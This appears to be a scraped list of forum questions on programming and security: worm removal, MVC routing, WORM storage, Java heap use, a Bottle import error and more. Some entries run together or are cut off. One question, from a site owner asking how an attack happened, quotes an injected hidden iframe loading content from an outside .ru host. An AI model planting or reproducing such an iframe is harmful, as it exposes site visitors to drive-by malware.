  • Python/Lesta.A worm

    My Nod32 have been catching something that is apparently identified as Python/Lesta.A worm. No matter how many times I tell Nod32 to delete and quarantine the file, it always re-appear, the situation will repeat about 3-4 times a day. This thing has been creating a folder called "pamela" in one of my drives, it sometimes also creates a "xxx.folder" file, which Nod32 identifies as "Exploit/CodeBase virus". I have Googled, and done pretty much everything related to this: a full scan in safe mode with no networking turned on, and also ran Ad-Aware, SpyBot, SpyHunter, ComboFix and cleaned the registry. Any idea how I can completely get rid of this annoying virus/worm?

  • ASP.NET MVC Controllers & Actions In Regards To URLs And SEO

    The general idea is that if I were to create an MVC site, simple pages such as the contact and about pages will be placed under the Home Controller. So my URL would look like http://www.mysite.com/home/contact, and http://www.mysite.com/home/about. The above works just fine, but I really don't like the idea of having the "home" portion in the URL. So what negatives would there be if I decided to make a controller name of Contact and About and just added a single Index action so that way the URL would be simplified to http://www.mysite.com/contact and http://www.mysite.com/about. This method looks cleaner. Do any of you do the same or something similar? I've been trying to work on SEO for an escort service site I've developed and when you search for the females the link looks like http://www.mysite.com/escorts/female-escorts, and like-wise for males. I'm wondering if I should remove the Escorts Controller and just create a Female_Escorts Controller with an Index Action only so it comes out like the above as http://www.mysite.com/female-escorts.

    i have a 1st person camera that collides with walls, i also have a small sphere in front of my camera denoted by the camera position plus the distance ahead.   • Where do I start in regards to making a Gnome/Unity Form Application

    Ok so I am familiar with developing Form and Console applications on Windows using Visual Studio .Net with C#, but where do I start when it comes to Linux distro's like Ubuntu, is there an equivalent? How would one go about matching what they can do in a Windows environment with .Net and C# in a Linux environment without .Net coding in something like Java or C/C++? I am aware of Eclipse, does eclipse have a form designer or do you have to code the design of any Gnome/Unity forms manually? Can I use eclipse to write the Linux equivalent of a console application, that you just double click on to run? I also know about Mono, but the idea is that I want to learn how to develop software without using anything in the Microsoft stack and am not sure where to start. What is the standard language/framework used to develop these types of applications on Linux? As I become more proficient with Visual Studio, C# and .Net, it has struck me that without these Microsoft tools, I am nothing. I am only capable of developing for the Microsoft OS and this scares me. This isn't some anti Microsoft thing, Microsoft makes some incredible Software/Hardware/Operating Systems/IDE's, but it is generally a bad idea to put all of your eggs in one basket so if I want to learn how to develop Terminal and Gnome/Unity form applications where in the world do I start? I have used Linux on and off for years, but Windows has been my primary OS. However I have watched Linux get better and better and as much as I love Windows 7, I am dubious about Windows 8 (I for one will sorely miss my start menu)! Obviously MS aren't going anywhere anytime soon and I could spend the the next couple of decades developing for .Net without any issues but just because you can get away with something doesn't always mean it's a good idea.   • In regards to applet games and UDP

    I've got about a year in Java experience, and would like to set up a server and client for an applet game. However, there doesn't appear to be any tutorials out there on anything like I want to use. I would the server to be able to store an array of x and y coordinates with a player name somehow associated to them, and send them to multiple clients in a short time span. I would like the client implemented in the applet, and be able to request any player's position data. I'd like to use UDP, because it seems to be the best option for efficient (if less reliable) transmission of data. If anyone could give me some pointers on how to do such a project, or point me to an appropriate tutorial, I'd certainly appreciate it.

  • Write once, read many (WORM) using Linux file system

    I have a requirement to write files to a Linux file system that can not be subsequently overwritten, appended to, updated in any way, or deleted. Not by a sudo-er, root, or anybody. I am attempting to meet the requirements of the financial services regulations for recordkeeping, FINRA 17A-4, which basically requires that electronic documents are written to WORM (write once, read many) devices. I would very much like to avoid having to use DVDs or expensive EMC Centera devices. Is there a Linux file system, or can SELinux support the requirement for files to be made complete immutable immediately (or at least soon) after write? Or is anybody aware of a way I could enforce this on an existing file system using Linux permissions, etc? I understand that I can set readonly permissions, and the immutable attribute. But of course I expect that a root user would be able to unset those. I considered storing data to small volumes that are unmounted and then remounted read-only, but then I think that root could still unmount and remount as writable again. I'm looking for any smart ideas, and worst case scenario I'm willing to do a little coding to 'enhance' an existing file system to provide this. Assuming there is a file system that is a good starting point. And put in place a carefully configured Linux server to act as this type of network storage device, doing nothing else. After all of that, encryption on the files would be useful too!

  • iphone quartz drawing 2 lines on top of each other causes worm effect

    I'm using Quartz-2D for iPhone to display a route on a map. The route is colored according to temperature. Because some streets are colored yellow, I am using a slightly thicker black line under the route line to create a border effect, so that yellow parts of the route are spottable on yellow streets. But, even if the black line is as thick as the route line, the whole route looks like a worm (very ugly). I tought this was because I was drawing lines from waypoint to waypoint, instead using the last waypoint as the next starting waypoint. That way if there is a couple of waypoints missing, the route will still have no cuts.     If I were to extricate my current membership provider from my solution, i.e. as a dll and expose it as a web service with it's own db, how would I model the relationships with regards to SOA design. For example I have a table: USER id, name, lastname, username, password, role. and table PRODUCT id, name, price, createdate, userid the foreign key being userid to table user. How would I model the relationship and/or query the db. If I wanted to get all products that were uploaded today for example, before I would query: SELECT u.name, u.lastname, u.username, p.* FROM PRODUCT p INNER JOIN USER u ON p.userid = u.id WHERE createdate = '05/05/2010' Now that I don't have the table within the database how would I perform this query?     A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link). A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem? The iframe code was something of the sort: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

  • Newbie python error in regards to import

    Hello. I'm a python newbie and starting out with using the Bottle web framework on Google App Engine. I've been messing with the super small, super easy Hello World sample and have already ran into problems. Heh. I finally got the code to work with this... import bottle from bottle import route from google.appengine.ext.webapp import util @route('/hello') def hello(): return "Hello World!" util.run_wsgi_app(bottle.default_app()) My question is, I thought I could just go 'import bottle' without the second line. But if I take the second line out, I get a NameError. Or if I do 'from bottle import *', I still get the error. bottle is just a single file called 'bottle.py' in my site's root directory.     Comparable contract specifies that e.compareTo(null) must throw NullPointerException. From the API: Note that null is not an instance of any class, and e.compareTo(null) should throw a NullPointerException even though e.equals(null) returns false. On the other hand, Comparator API mentions nothing about what needs to happen when comparing null.     I know about primitives and objects living on the heap, but how does the number of methods effect heap size of the object? For example: public class A { int x; public getX() { return x; } } public class B { int x; public getX() { return x; } public getXString() { return String.valueOf(x); } public doMoreInterestingStuff() { return x * 42; } //etc } When instantiated, both objects live on the heap, both have memory allocated to their primitive x, but is B allocated more heap space due to having more method signatures? Or are those ONLY on the classLoader? In this example its trivial, but when there are 100,000+ of these objects in memory at any given time I imagine it could add up.

But as I am reading about MVC2 models I see an example where EF is more loosely coupled with your data model. If I have to add or remove some columns from a table then what is involved in updating my model or DAL with each of these implementations?

I found this Remark over MSDN: http://msdn.microsoft.com/en-us/library/aa379573%28VS.85%29.aspx "Some SECURITY_INFORMATION members work only with the SetNamedSecurityInfo function. These members are not returned in the structure returned by other security functions such as GetNamedSecurityInfo..." "Some members..." Which members? Why? "Other Security functions such as..."     suppose the machine is clean of all malware but not in any sense updated, patched, secured etc. Suppose I connect it to the internet from behind wireless router with the intent of using it only on a few trusted sites and only there. Or, for the sake of argument, maybe I wouldn't do any browsing at all, just let it sit there connected to the network. This is all happening in a residential situation with cable internet. In this situation can a remote attacker somehow detect the fact that the machine is connected to the internet and try connecting to do an exploit?
